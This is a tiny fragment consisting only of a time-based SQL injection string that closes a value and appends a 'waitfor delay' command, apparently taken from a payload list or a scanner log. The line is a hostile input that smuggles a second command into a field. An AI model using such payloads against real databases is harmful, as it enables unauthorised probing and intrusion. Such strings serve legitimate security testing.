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555-1); waitfor delay '0:0:15' -- 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